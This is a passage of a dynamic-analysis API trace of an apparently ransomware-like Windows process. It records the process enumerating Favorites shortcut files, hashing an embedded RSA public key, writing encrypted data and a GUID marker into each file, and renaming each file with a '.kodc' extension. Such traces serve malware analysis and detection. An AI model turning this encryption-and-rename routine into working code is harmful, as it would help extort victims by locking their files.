flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.452] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.452] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.453] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.453] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.453] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.454] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.454] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.454] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.454] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.454] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.454] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0101.455] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.455] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.455] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.455] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.455] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.455] GetLastError () returned 0x0 [0101.455] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.456] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0101.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.456] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.456] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.456] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.456] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.456] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.456] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5ed8 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7f98 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5f20 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fb0 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fe0 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ff8 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.457] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fe0 | out: hHeap=0x630000) returned 1 [0101.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ff8 | out: hHeap=0x630000) returned 1 [0101.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.457] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a10 [0101.457] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32ceca0 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb7ff8 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32adee0 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7fe0 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cecc0 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c540 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c658 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32aed00 [0101.458] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec00 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c540 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ff8 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cecc0 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7fe0 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32adee0 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a10 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338dc8 | out: hHeap=0x630000) returned 1 [0101.458] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.459] GetCurrentThreadId () returned 0x42c [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69b948 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x9ba7f18 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x3316db8 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x693378 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x3298d18 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cecc0 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69be70 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.459] GetCurrentThreadId () returned 0x42c [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x32b14c8 [0101.459] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.459] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x706018 [0101.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x706018 | out: hHeap=0x630000) returned 1 [0101.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32b14c8 | out: hHeap=0x630000) returned 1 [0101.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bd68 [0101.460] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32ceca0 | out: hHeap=0x630000) returned 1 [0101.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x3318138 [0101.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32ceca0 [0101.460] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x69bc60 [0101.460] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.460] WriteFile (in: hFile=0x5cc, lpBuffer=0x69b948*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x69b948*, lpNumberOfBytesWritten=0x9e2fb50*=0x100, lpOverlapped=0x0) returned 1 [0101.461] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x69b948 | out: hHeap=0x630000) returned 1 [0101.461] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0101.461] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9e2fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9e2fb50*=0x26, lpOverlapped=0x0) returned 1 [0101.461] CloseHandle (hObject=0x5cc) returned 1 [0101.462] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Home.url.kodc" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at home.url.kodc")) returned 1 [0101.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33515f0 | out: hHeap=0x630000) returned 1 [0101.463] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.463] VirtualFree (lpAddress=0x21b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0101.465] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32f3058 | out: hHeap=0x630000) returned 1 [0101.465] FindNextFileW (in: hFindFile=0x670618, lpFindFileData=0x9e2fba4 | out: lpFindFileData=0x9e2fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28d4b900, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d4b900, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d86cf60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Microsoft At Work.url", cAlternateFileName="MICROS~2.URL")) returned 1 [0101.465] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url") returned=".url" [0101.465] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Favorites\\Microsoft Websites\\Microsoft At Work.url" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\favorites\\microsoft websites\\microsoft at work.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0101.465] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9e2fb40 | out: lpFileSize=0x9e2fb40*=133) returned 1 [0101.465] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x21b0000 [0101.469] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0101.469] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9e2fb78, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb78*=0x26, lpOverlapped=0x0) returned 1 [0101.470] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.471] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.471] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0101.471] ReadFile (in: hFile=0x5cc, lpBuffer=0x21b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9e2fb70, lpOverlapped=0x0 | out: lpBuffer=0x21b0000*, lpNumberOfBytesRead=0x9e2fb70*=0x85, lpOverlapped=0x0) returned 1 [0101.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.471] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f1) returned 0x32d2a78 [0101.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.471] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0101.472] CryptAcquireContextW (in: phProv=0x9e2fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9e2fa50*=0x693378) returned 1 [0101.473] CryptCreateHash (in: hProv=0x693378, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9e2fa58 | out: phHash=0x9e2fa58) returned 1 [0101.473] CryptHashData (hHash=0x3331bc8, pbData=0x32d2a78, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0101.473] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x0, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9e2fa54) returned 1 [0101.473] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x32adf00 [0101.473] CryptGetHashParam (in: hHash=0x3331bc8, dwParam=0x2, pbData=0x32adf00, pdwDataLen=0x9e2fa54, dwFlags=0x0 | out: pbData=0x32adf00, pdwDataLen=0x9e2fa54) returned 1 [0101.473] GetLastError () returned 0x0 [0101.473] CryptDestroyHash (hHash=0x3331bc8) returned 1 [0101.473] CryptReleaseContext (hProv=0x693378, dwFlags=0x0) returned 1 [0101.473] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32d2a78 | out: hHeap=0x630000) returned 1 [0101.473] UuidCreate (in: Uuid=0x9e2fa48 | out: Uuid=0x9e2fa48) returned 0x0 [0101.473] UuidToStringA (in: Uuid=0x9e2fa48, StringUuid=0x9e2fa40 | out: StringUuid=0x9e2fa40) returned 0x0 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.474] RpcStringFreeA (in: String=0x9e2fa40 | out: String=0x9e2fa40) returned 0x0 [0101.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x33171a8 | out: hHeap=0x630000) returned 1 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x33171a8 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c0 [0101.474] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0101.474] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3317170 | out: hHeap=0x630000) returned 1 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32cc1c0 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x3317170 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f0) returned 0x32d2a78 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338fa8 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5f20 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fb0 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x9bb5f68 [0101.474] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7fc8 [0101.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7ff8 [0101.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb8010 [0101.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x334ce70 [0101.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x9b9f078 [0101.475] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x9b9f078, Size=0x218) returned 0x32cef08 [0101.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x694598 [0101.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ff8 | out: hHeap=0x630000) returned 1 [0101.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8010 | out: hHeap=0x630000) returned 1 [0101.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x334ce70 | out: hHeap=0x630000) returned 1 [0101.475] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694598 | out: hHeap=0x630000) returned 1 [0101.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x9bb7a40 [0101.475] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec00 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x9bb8010 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x32aed00 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x9bb7ff8 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x32cec10 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x9b8c658 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x332fc30 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x3338dc8 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adf00 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x9b8c770 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x32adee0 [0101.476] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x32cec90 [0101.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9b8c658 | out: hHeap=0x630000) returned 1 [0101.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb8010 | out: hHeap=0x630000) returned 1 [0101.476] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec10 | out: hHeap=0x630000) returned 1 [0101.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7ff8 | out: hHeap=0x630000) returned 1 [0101.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32aed00 | out: hHeap=0x630000) returned 1 [0101.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cec00 | out: hHeap=0x630000) returned 1 [0101.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x9bb7a40 | out: hHeap=0x630000) returned 1 [0101.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x332fc30 | out: hHeap=0x630000) returned 1 [0101.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3338fa8 | out: hHeap=0x630000) returned 1 [0101.477] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x32cef08 | out: hHeap=0x630000) returned 1 [0101.477] GetCurrentThreadId () returned 0x42c [0101.477] 